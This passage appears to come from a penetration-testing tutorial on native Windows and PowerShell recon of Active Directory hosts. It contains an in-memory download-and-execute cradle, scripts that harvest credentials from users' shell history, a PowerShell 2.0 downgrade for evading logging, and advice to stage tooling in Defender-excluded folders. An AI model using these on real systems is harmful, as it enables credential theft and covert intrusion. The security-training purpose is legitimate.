This section covers how to gather information about an Active Directory environment with tools that are already built into Windows, run either from a foothold host or from a Windows attack host, without uploading anything that an EDR agent or file-integrity monitor could flag. Everything below uses native CMD and PowerShell commands.

Env Commands For Host & Network Recon

Basic Enumeration Commands

Command
    Result

hostname
    Prints the host's computer name.

[System.Environment]::OSVersion.Version
    Prints the OS version and revision level (PowerShell).

wmic qfe get Caption,Description,HotFixID,InstalledOn
    Prints the patches and hotfixes applied to the host. wmic is deprecated and is missing on recent Windows 11 builds; Get-HotFix is the PowerShell equivalent.

ipconfig /all
    Prints the state and configuration of every network adapter: IP, MAC, DHCP and DNS servers, and the connection-specific DNS suffix, which usually reveals the AD domain.

set
    Lists the environment variables for the current session, including PATH, which often shows which tools are installed (run from a CMD prompt).

echo %USERDOMAIN%
    Prints the domain the host belongs to (run from a CMD prompt).

echo %logonserver%
    Prints the name of the domain controller that authenticated the current logon (run from a CMD prompt).

systeminfo
    Prints a summary of the host in one command: OS name and version, installed hotfixes, domain, logon server, and network adapters.

Harnessing PowerShell

PowerShell has many built-in cmdlets and modules we can use on an engagement to recon the host and network and to send and receive files.

Let's look at a few of the ways PowerShell can help us.

Cmdlet
    Description

Get-Module
    Lists the modules currently loaded into the session. Get-Module -ListAvailable shows every module installed on the host.

Get-ExecutionPolicy -List
    Prints the execution policy set at each scope (MachinePolicy, UserPolicy, Process, CurrentUser, LocalMachine).

Set-ExecutionPolicy Bypass -Scope Process
    Changes the policy for the current process only. The Process-scope setting lives in memory and disappears when the process exits, so no permanent change is left on the host. Execution policy is a safety feature for administrators, not a security boundary, and changing it at Process scope needs no elevation.

Get-ChildItem Env: | ft Key,Value
    Lists the environment variables for the session (the PowerShell equivalent of set): user and computer names, paths, and anything an administrator has parked in a variable.

Get-Content $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    Reads the current user's PSReadLine history, which persists across sessions (unlike Get-History). It often contains passwords typed on the command line or points to configuration files and scripts that contain them.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
    Downloads a script over HTTP(S) and executes it in memory with Invoke-Expression (iex) without writing it to disk. -nop skips the user's profile and -c runs the quoted command. If script block logging is enabled, the downloaded content is still recorded in Event ID 4104.
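As an added example that is not part of the original page, the function below strings the native commands from both tables into one recon object and then triages PSReadLine history for credential-looking commands. Get-HostRecon, Find-HistoryCredentials and Find-AllHistoryCredentials are names chosen here, and the credential patterns are heuristics I picked, not an exhaustive list; the cmdlets, variables and file paths are standard Windows PowerShell 5.x (Get-HotFix stands in for wmic qfe, which is deprecated and missing on recent Windows 11 builds).

```powershell
# Added example, not from the original page. Assumes Windows PowerShell 5.x on
# a domain-joined host; nothing is uploaded and nothing is written to disk.

function Get-HostRecon {
    # One object holding what hostname, OSVersion, wmic qfe, ipconfig, set,
    # %USERDOMAIN% and %logonserver% report individually.
    [PSCustomObject]@{
        Hostname    = $env:COMPUTERNAME
        OSVersion   = [System.Environment]::OSVersion.Version.ToString()
        Domain      = $env:USERDOMAIN
        LogonServer = $env:LOGONSERVER          # the DC that authenticated this logon
        User        = $env:USERNAME
        # Get-HotFix is the cmdlet form of 'wmic qfe get ...' (wmic is deprecated).
        Hotfixes    = @(Get-HotFix | Sort-Object InstalledOn -Descending |
                        Select-Object -First 5 HotFixID, InstalledOn)
        # Non-loopback IPv4 addresses, as ipconfig /all would show them.
        IPv4        = @(Get-NetIPAddress -AddressFamily IPv4 |
                        Where-Object { $_.IPAddress -notlike '127.*' } |
                        Select-Object InterfaceAlias, IPAddress)
        # Scopes where a policy is actually set; Process and CurrentUser are ours to change.
        ExecPolicy  = @(Get-ExecutionPolicy -List | Where-Object ExecutionPolicy -ne 'Undefined')
    }
}

# Heuristic regexes (my choice, not exhaustive) for credentials left in shell history.
$script:CredPatterns = @(
    'pass(word|wd)?\s*[=:]'                # password=..., pwd: ...
    '-AsPlainText|ConvertTo-SecureString'  # hard-coded SecureString literals
    '-Credential\s+\S'                     # Invoke-Command ... -Credential 'DOM\user'
    'net\s+use\b.*/user:'                  # net use \\srv\share Passw0rd /user:DOM\user
    'runas\b.*/user:'
    'cmdkey\s+/add'                        # stored Windows credentials
    '(api|secret|token)[_-]?key\s*[=:]'
)

function Find-HistoryCredentials {
    param(
        # Default: the current user's PSReadLine history. Pass another user's file
        # to triage it instead (readable only with sufficient rights).
        [string]$Path = "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
    )
    if (-not (Test-Path -LiteralPath $Path)) { return }
    # Select-String takes an array of regexes and reports the matching line number.
    Select-String -LiteralPath $Path -Pattern $script:CredPatterns |
        ForEach-Object {
            [PSCustomObject]@{ Path = $_.Path; Line = $_.LineNumber; Command = $_.Line.Trim() }
        }
}

function Find-AllHistoryCredentials {
    # Every profile's history the current token can read. Other users' profiles
    # normally need local admin, so anything returned from them is already a win.
    Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue |
        ForEach-Object { Find-HistoryCredentials -Path $_.FullName }
}

Get-HostRecon | Format-List
Find-AllHistoryCredentials | Format-Table -AutoSize -Wrap
```

Paste the block into a session rather than saving it as a .ps1: that keeps it within the "nothing uploaded" spirit of the section and avoids the execution policy question entirely. A hit from Find-AllHistoryCredentials in another user's profile is worth more than the password itself, because it also tells you that user has typed secrets on the command line before.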

Downgrade PowerShell

Starting the PowerShell 2.0 engine sidesteps most PowerShell logging: module logging arrived in PowerShell 3.0 and script block logging (Event ID 4104) in 5.0, and the 2.0 engine implements neither, so commands run in it leave no script block events behind. Three caveats matter in practice. The v2 engine must be present: it is an optional Windows feature (MicrosoftWindowsPowerShellV2) that also needs .NET Framework 2.0/3.5, it is commonly removed on hardened Windows 10/11 and Server 2016+ builds, and powershell.exe -version 2 then fails with a .NET Framework error. The downgrade is itself visible: the classic Windows PowerShell log still records Event ID 400 (engine state changed to Available) with EngineVersion=2.0 next to the 5.x HostVersion, and process-creation auditing (Event ID 4688) or Sysmon captures the -version 2 command line, so defenders routinely alert on both. Finally, this only works from Windows PowerShell; PowerShell 7 (pwsh) has no switch to load an older engine.

Get-Host                   # note the version: 5.x on a current host
powershell.exe -version 2  # start a 2.0 engine inside this session (fails if the v2 feature or .NET 3.5 is absent)
Get-Host                   # Version now reads 2.0
Get-Module                 # far fewer modules are loaded under the v2 engine
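The following is an added example, not from the original page, that turns the downgrade into two checks: whether the 2.0 engine is available on this host at all, and, from the defender's side, how the downgrade shows up in the classic Windows PowerShell event log. Test-PSv2Engine and Find-PSDowngradeEvents are names chosen here; the -Version switch, $PSVersionTable and Event ID 400 are standard. Reading the event log of a hardened host may need administrator rights.

```powershell
# Added example, not from the original page. Requires Windows PowerShell
# (powershell.exe); pwsh has no -Version switch for older engines.

function Test-PSv2Engine {
    # The v2 engine is an optional feature (MicrosoftWindowsPowerShellV2) that also
    # needs .NET Framework 2.0/3.5. A live probe is the most reliable check, but it
    # IS a downgrade and writes the same Event ID 400 the function below hunts for.
    # Quieter alternative (needs admin):
    #   Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
    $out  = & powershell.exe -NoProfile -NonInteractive -Version 2 -Command '$PSVersionTable.PSVersion.Major' 2>&1
    $text = ($out | Out-String).Trim()
    [PSCustomObject]@{
        V2Available = ($text -eq '2')
        ExitCode    = $LASTEXITCODE
        Detail      = $text   # '2', or the .NET Framework error when the engine is absent
    }
}

function Find-PSDowngradeEvents {
    param([int]$Days = 7)
    # Every engine, 2.0 included, logs Event ID 400 ('Engine state is changed from
    # None to Available') to the classic 'Windows PowerShell' log. The event's
    # details carry both HostVersion (the 5.x host process) and EngineVersion, so
    # HostVersion=5.x alongside EngineVersion=2.0 is the downgrade signature.
    # With process auditing on, Event ID 4688's command line shows '-version 2' too.
    $filter = @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
        ForEach-Object {
            [PSCustomObject]@{
                Time        = $_.TimeCreated
                Computer    = $_.MachineName
                HostVersion = [regex]::Match($_.Message, 'HostVersion=(\S+)').Groups[1].Value
                CommandLine = [regex]::Match($_.Message, 'HostApplication=(.+)').Groups[1].Value.Trim()
            }
        }
}

Test-PSv2Engine
Find-PSDowngradeEvents -Days 30 | Format-Table -AutoSize
```

Run Find-PSDowngradeEvents on your own attack host after a lab exercise and you will see the probe and every later downgrade listed with its full command line, which is exactly what a SOC sees; if that is not acceptable for the engagement, the registry and optional-feature checks are the quieter way to answer the availability question.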

Checking Defenses

The next few commands use the netsh and sc utilities to see how the host's Windows Firewall profiles are configured and whether the Windows Defender service (WinDefend) is running, followed by the Defender PowerShell module for the detail. Both netsh advfirewall show and sc query work as a standard user; changing anything would need administrator rights.

Firewall Checks

# Using CMD or PowerShell
netsh advfirewall show allprofiles

# Using CMD
sc query windefend

Check Status and Configuration settings

# Using PowerShell (Defender module)
Get-MpComputerStatus

Get-MpComputerStatus tells us how current the engine and signatures are (AntivirusSignatureVersion, AntivirusSignatureAge), which protections are on (RealTimeProtectionEnabled, BehaviorMonitorEnabled, IoavProtectionEnabled, NISEnabled), when the last quick and full scans ran (QuickScanEndTime, FullScanEndTime), and whether Tamper Protection (IsTamperProtected) would block an attempt to change any of it. Get-MpPreference adds the configured exclusions, which matter because an excluded directory or process is the natural place to stage tooling; on current Defender builds the exclusion lists are only returned to administrators.
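As an added example that is not part of the original page, one function that answers the defense questions above from PowerShell and flags what matters to an operator: disabled firewall profiles, a stopped WinDefend service, real-time protection or behaviour monitoring switched off, stale signatures, and any configured exclusions. Get-DefenseStatus is a name chosen here and the 'Concerns' thresholds are mine; it uses Get-NetFirewallProfile (NetSecurity module, Windows 8/Server 2012+) in place of netsh, Get-Service in place of sc query windefend, and Get-MpComputerStatus / Get-MpPreference from the Defender module.

```powershell
# Added example, not from the original page. Windows 8/Server 2012+ with the
# Defender module; reading Defender exclusions requires admin on current builds.

function Get-DefenseStatus {
    $fw   = Get-NetFirewallProfile -ErrorAction SilentlyContinue |
            Select-Object Name, Enabled, DefaultInboundAction, DefaultOutboundAction, LogAllowed, LogBlocked
    $svc  = Get-Service -Name WinDefend -ErrorAction SilentlyContinue   # same as 'sc query windefend'
    $mp   = Get-MpComputerStatus -ErrorAction SilentlyContinue
    $pref = Get-MpPreference -ErrorAction SilentlyContinue

    $concerns = New-Object System.Collections.Generic.List[string]

    foreach ($p in $fw) {
        # Enabled is a GpoBoolean (True/False/NotConfigured), so compare as text.
        if ("$($p.Enabled)" -eq 'False') { $concerns.Add("Firewall profile '$($p.Name)' is disabled") }
        elseif ("$($p.DefaultInboundAction)" -eq 'Allow') { $concerns.Add("Profile '$($p.Name)' allows inbound by default") }
    }
    if (-not $svc -or $svc.Status -ne 'Running') {
        $concerns.Add('WinDefend service is not running (absent, or a third-party AV has taken over)')
    }
    if ($mp) {
        if (-not $mp.RealTimeProtectionEnabled) { $concerns.Add('Real-time protection is off') }
        if (-not $mp.BehaviorMonitorEnabled)    { $concerns.Add('Behavior monitoring is off') }
        if (-not $mp.IoavProtectionEnabled)     { $concerns.Add('Downloaded-file (IOAV) scanning is off') }
        if ($mp.AntivirusSignatureAge -gt 7)    { $concerns.Add("AV signatures are $($mp.AntivirusSignatureAge) days old") }
        # IsTamperProtected only exists on newer Defender builds; skip it where absent.
        if ($mp.PSObject.Properties['IsTamperProtected'] -and -not $mp.IsTamperProtected) {
            $concerns.Add('Tamper Protection is off: an admin can change these settings')
        }
    }
    if ($pref) {
        foreach ($kind in 'ExclusionPath', 'ExclusionExtension', 'ExclusionProcess') {
            if ($pref.$kind) { $concerns.Add("$kind configured: $($pref.$kind -join ', ')") }
        }
        if ($pref.DisableRealtimeMonitoring) { $concerns.Add('Real-time monitoring disabled by preference') }
    }

    [PSCustomObject]@{
        Firewall        = $fw
        DefenderService = if ($svc) { $svc.Status } else { 'NotInstalled' }
        Defender        = if ($mp) {
            $mp | Select-Object RealTimeProtectionEnabled, BehaviorMonitorEnabled, IoavProtectionEnabled,
                                NISEnabled, AntivirusSignatureVersion, AntivirusSignatureAge,
                                QuickScanEndTime, FullScanEndTime
        }
        Concerns        = $concerns.ToArray()
    }
}

$d = Get-DefenseStatus
$d.Firewall | Format-Table -AutoSize
$d.Defender | Format-List
$d.Concerns
```

An empty Concerns array on a domain workstation is the normal case and tells you to plan for in-memory tradecraft; a populated ExclusionPath, by contrast, is a directory Defender will never scan, which is as good as a green light for dropping tooling there.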

Am I Alone?